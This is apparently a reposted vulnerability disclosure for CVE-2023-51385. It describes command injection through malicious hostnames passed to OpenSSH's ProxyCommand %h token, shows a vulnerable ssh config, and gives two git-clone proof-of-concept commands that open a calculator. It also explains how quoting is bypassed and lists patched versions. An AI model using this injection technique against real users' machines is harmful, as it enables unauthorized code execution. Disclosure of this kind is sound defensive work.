OpenSSH 命令注入漏洞(CVE-2023-51385)

SSH ProxyCommand == unexpected code execution (CVE-2023-51385) ============================================================== Dec 20, 2023 Summary ------- SSH’s `ProxyCommand` is a feature quite widely used to proxy ssh connections by allowing to specify custom commands to be used to connect to the server. Arguments to this directive may contain tokens like `%h`, `%u` which refer to hostname and username respectively. When coming from untrusted sources, a hostname can be malicious and look something like **\`malicious-command\`** (backticks would allow a command to be executed in shell) [More info in docs which describe this feature in detail](https://man.openbsd.org/ssh_config#ProxyCommand) Let’s review an example ----------------------- Taking an example based on the [docs](https://man.openbsd.org/ssh_config#ProxyCommand) Host *.example.com ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p In this case, there is no sanitization of hostname and if `%h` contains a malicious hostname, it may allow command execution. Can I haz PoC? -------------- What good is all this without a PoC? So here we go! Once you have added the above example to your `.ssh/config`, try following which should pop a calculator on OS X. git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules Even if the ProxyCommand is being used with single quotes to sanitize arguments i.e. '%h', it is not sufficient since an attacker controlled hostname might itself contain a single quote and defeat quoting. PoC 2: git clone https://github.com/vin01/poc-proxycommand-vulnerable-v2 --recurse-submodules Remediation ----------- Update to: * [OpenSSH 9.6p1](https://www.openssh.com/txt/release-9.6) * [libssh 0.10.6 and 0.9.8](https://www.libssh.org/security/advisories/CVE-2023-6004.txt) Vulnerable usage out in the wild -------------------------------- * [https://help.okta.com/asa/en-us/content/topics/adv\_server\_access/docs/custom-ssh-client.htm](https://help.okta.com/asa/en-us/content/topics/adv_server_access/docs/custom-ssh-client.htm) * [https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/use-cases/ssh/) * [https://cloud.google.com/iap/docs/tcp-by-host](https://cloud.google.com/iap/docs/tcp-by-host) * [https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-getting-started-enable-ssh-connections.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/session-manager-getting-started-enable-ssh-connections.html) * [https://goteleport.com/docs/connect-your-client/tsh/](https://goteleport.com/docs/connect-your-client/tsh/) * [https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Proxies\_and\_Jump\_Hosts#Tunneling\_the\_SSH\_Client\_Over\_Tor\_with\_Netcat](https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Proxies_and_Jump_Hosts#Tunneling_the_SSH_Client_Over_Tor_with_Netcat) CVEs and references ------------------- * [CVE-2023-51385](https://nvd.nist.gov/vuln/detail/CVE-2023-51385) * [CVE-2023-6004](https://access.redhat.com/security/cve/cve-2023-6004) My sincere thanks to: --------------------- * Kevin Roh @ Okta for brilliant triaging and impact assessment * Jakub Jelen @ libssh for timely follow up and communication * Damien Miller and others @ Openssh for patches and discussions * Maintainers @ Git for discussions to define a potential trust boundary between ssh and git **[How to donate to OpenSSH/OpenBSD](https://www.openbsd.org/donations.html)**